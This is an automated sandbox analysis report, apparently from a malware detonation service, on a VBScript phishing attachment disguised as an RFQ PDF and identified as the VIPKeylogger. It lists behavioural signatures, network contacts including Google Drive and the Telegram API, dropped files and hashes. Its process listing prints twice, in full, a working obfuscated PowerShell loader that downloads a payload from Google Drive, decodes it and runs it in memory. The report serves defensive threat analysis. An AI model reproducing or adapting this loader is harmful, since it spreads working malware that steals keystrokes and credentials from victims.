Analysis Overview
SHA256
ee763e48dad8e005251345990a572ccbf15929e76c5fa68ab3d1fc80ef7e5286
Threat Level: Known bad
The file RFQ_64182MR_PDF.R00.vbs was found to be: Known bad.
Malicious Activity Summary
VIPKeylogger
Blocklisted process makes network request
Checks computer location settings
Command and Scripting Interpreter: PowerShell
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Program crash
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-24 06:41
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-24 06:41
Reported
2024-10-24 07:40
Platform
win7-20240903-en
Max time kernel
35s
Max time network
126s
Command Line
Signatures
VIPKeylogger
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_64182MR_PDF.R00.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios .tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios .tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.178.3:80 | o.pki.goog | tcp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 193.122.130.0:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.67.152:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.18.190.80:80 | crl.microsoft.com | tcp |
Files
memory/2896-4-0x000007FEF513E000-0x000007FEF513F000-memory.dmp
memory/2896-5-0x000000001B700000-0x000000001B9E2000-memory.dmp
memory/2896-6-0x0000000001E60000-0x0000000001E68000-memory.dmp
memory/2896-7-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp
memory/2896-8-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp
memory/2896-9-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp
memory/2896-11-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp
memory/2896-10-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp
memory/2896-13-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp
memory/2896-14-0x000007FEF513E000-0x000007FEF513F000-memory.dmp
memory/2896-16-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZEWQANB74JC5JAIXK3PO.temp
| MD5 | d0a1b6f8c101524394750e499ab57ab4 |
| SHA1 | d76539a75d684d909358551bc0166f9fd0dc8e4a |
| SHA256 | e8b790bea3d144883ec5b0fdf38a397e81a303fca748a97c6a776c0525210a4c |
| SHA512 | 8c2f3e896d6f423cfb102fe985b2eeaf2986f67a52830b59ac7f73414acb20b2e16e122ca306f9956af8d597cf5e6e6ad229c43d346e3dd781cb9138ae2dc78c |
C:\Users\Admin\AppData\Roaming\Platyhelminthic195.End
| MD5 | 6771cd798c1df9b5eddc60071dfc6e15 |
| SHA1 | 65e923600e1c2604d90a481d257dc99c23fbf1dd |
| SHA256 | 0849655061e0ce5f5f2633e43ef08a62a3482cf9f15baf24fbd6b25f8abad95f |
| SHA512 | cf0013a56ef6ab5fb48ddd80d3e94b879b6890586a5e11313c66b35c352111d3fff2d21a9f9e42a4163cf4e05419610a696e5d428a32eacb45d6f4103b9085ee |
memory/2144-20-0x0000000006780000-0x000000000B708000-memory.dmp
memory/2200-42-0x0000000000740000-0x00000000017A2000-memory.dmp
memory/2200-43-0x0000000000740000-0x00000000017A2000-memory.dmp
memory/2200-44-0x0000000000740000-0x0000000000788000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-24 06:41
Reported
2024-10-24 08:19
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\msiexec.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1720 wrote to memory of 2516 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1720 wrote to memory of 2516 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4948 wrote to memory of 4364 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4948 wrote to memory of 4364 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
